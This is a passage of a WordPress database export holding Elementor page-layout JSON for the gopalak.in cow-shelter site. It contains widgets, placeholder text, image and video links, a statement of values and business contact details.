heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9113,1562,'_elementor_page_assets','a:0:{}'),(9115,1563,'_elementor_edit_mode','builder'),(9116,1563,'_elementor_template_type','wp-page'),(9117,1563,'_elementor_version','3.7.8'),(9118,1563,'_wp_page_template','elementor_canvas'),(9119,1563,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak 